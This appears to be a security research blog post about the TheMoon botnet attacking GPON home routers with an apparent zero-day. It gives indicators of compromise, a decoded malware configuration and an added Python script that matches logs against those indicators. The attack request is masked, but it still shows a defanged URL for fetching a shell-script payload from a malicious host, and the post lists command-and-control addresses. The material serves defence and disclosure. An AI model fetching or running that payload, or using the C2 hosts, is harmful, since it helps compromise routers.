GPON Exploit in the Wild (IV) - TheMoon Botnet Join in with a 0day(?)

This article was co-authored by Hui Wang, Rootkiter and Yegenshen.

It looks like this GPON party will never end. We just found that the TheMoon botnet has joined the party.

TheMoon botnet has been discussed in our previous article, in Chinese. Its activity can be seen as early as 2014, and since 2017 it has merged at least 6 IoT device exploits into its code. Now it has come to the GPON home router.

A very special thing about this round is the attacking payload. It is different from all the previous ones, so it looks like a 0day. We tested this payload on two different versions of the GPON home router, and it worked on both. All of this makes TheMoon totally different from the other players, and we chose NOT to disclose the attack payload details.

The key features of this round of TheMoon activity:

  • Scanner IP: 177.141.64.108 Brazil/BR São Paulo "AS28573 CLARO S.A."
  • Scanning Ports: 80, 8080, 81, 82, 8888, with the GPON scan only on port 80
  • Download Server: domstates.su
  • C2 Server:
    • 91.215.158.118 Netherlands/NL Amsterdam "AS60144 3W Infra B.V."
    • 149.202.211.227 France/FR Fontenay-sous-Bois "AS16276 OVH SAS"
    • 208.110.66.34 United States/US Kansas City "AS32097 WholeSale Internet, Inc."
    • 173.208.219.42 United States/US Kansas City "AS32097 WholeSale Internet, Inc."

The download server is the same as the one in our previous blog. This is why we attribute this round of attacks to the TheMoon botnet.

Attacking Payload (masked):

POST /--------/--------?---------/ HTTP/1.1  
Accept: */*  
Host: {}  
User-Agent: Wget(linux)  
Content-Length: 287  
Content-Type: application/x-www-form-urlencoded  
-------------------------------------------------------------
hxxp://domstates.su/gpon.sh  

The characteristics of this TheMoon sample can be summarized in the following JSON (the "# previous" annotations give the values seen in the earlier sample):

"nttpd,1-mips-be-t3-z":{
       "proto"   :"TCP",
       "version" :1,
       "regkey"  :0xB8,                            # previous 0xb7
       "specific":0x6D61641D,                      # previous 0x6D61641C
       "regport" :5784,                            # previous 5783
       "ccport"  :5184,                            # previous 5183
       "dwlport" :4584,                            # previous 4583
       "peerlist":[
           "91.215.158.118", # 0x5BD79E76          # C2, not changed
           "149.202.211.227",# 0x95CAD3E3          # C2, not changed
           "208.110.66.34",  # 0xD06E4222          # C2, not changed
           "173.208.219.42", # 0xADD0DB2A          # C2, not changed
       ]  
   }
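The peerlist above stores each C2 address as a big-endian 32-bit integer (0x5BD79E76 is 91.215.158.118), and the annotations show the register/C2/download ports incremented by one relative to the previous sample, so matching on the C2 addresses is more durable than matching on ports. The following is an added example, not code from the original post: it decodes the peerlist integers and checks a few constructed log lines (not real captures) against the IoCs listed in this post.

```python
import ipaddress
import re

# IoCs taken from this post: peerlist entries as stored in the config,
# the scanner IP, the download host and the two payload MD5s.
C2_PEERS_HEX = {0x5BD79E76, 0x95CAD3E3, 0xD06E4222, 0xADD0DB2A}
SCANNER_IP = "177.141.64.108"
DOWNLOAD_HOST = "domstates.su"
PAYLOAD_MD5S = {"17fb1bfae44a9008a4c9b4bdc6b327bd",
                "299919e8a5b4c8592db0c47207935b69"}

# Constructed sample log lines (NOT real captures): an HTTP access-log entry,
# two firewall connection records, a DNS query and an endpoint file event.
SAMPLE_LOGS = [
    '177.141.64.108 - - [12/May/2018:10:01:02 +0000] "POST /masked HTTP/1.1" 200 12 "-" "Wget(linux)"',
    "conn src=10.0.0.7 dst=91.215.158.118 dport=5184 proto=TCP",
    "conn src=10.0.0.7 dst=8.8.8.8 dport=53 proto=UDP",
    "dns query=domstates.su client=10.0.0.7",
    "file md5=299919e8a5b4c8592db0c47207935b69 path=/tmp/gpon.sh",
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")


def hex_to_ip(value: int) -> str:
    """Decode a big-endian 32-bit integer from the config into dotted-quad form."""
    return str(ipaddress.IPv4Address(value))


def c2_addresses() -> set:
    """The peerlist decoded to dotted-quad strings (matches the C2 list in the post)."""
    return {hex_to_ip(v) for v in C2_PEERS_HEX}


def classify(line: str) -> list:
    """Return the IoC categories a single log line matches (empty list if clean)."""
    hits = []
    ips = set(IPV4_RE.findall(line))
    if SCANNER_IP in ips:
        hits.append("scanner")
    if ips & c2_addresses():
        hits.append("c2")
    if DOWNLOAD_HOST in line:
        hits.append("download-server")
    if PAYLOAD_MD5S & set(MD5_RE.findall(line)):
        hits.append("payload-hash")
    # Weak indicator on its own: the masked request's User-Agent on a POST.
    if "Wget(linux)" in line and '"POST ' in line:
        hits.append("scan-user-agent")
    return hits


def scan_logs(lines) -> dict:
    """Map line index -> matched categories, skipping lines with no hits."""
    results = {}
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            results[i] = hits
    return results
```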

IoC

Download URLs

md5=17fb1bfae44a9008a4c9b4bdc6b327bd    url=hxxp://domstates.su/.nttpd,1-mips-be-t3-z  
md5=299919e8a5b4c8592db0c47207935b69    url=hxxp://domstates.su/gpon.sh  

C2

91.215.158.118 Netherlands/NL Amsterdam    "AS60144 3W Infra B.V."  
149.202.211.227 France/FR Fontenay-sous-Bois    "AS16276 OVH SAS"  
208.110.66.34 United States/US Kansas City    "AS32097 WholeSale Internet, Inc."  
173.208.219.42 United States/US Kansas City    "AS32097 WholeSale Internet, Inc."  

Scanner IP

177.141.64.108 Brazil/BR São Paulo    "AS28573 CLARO S.A."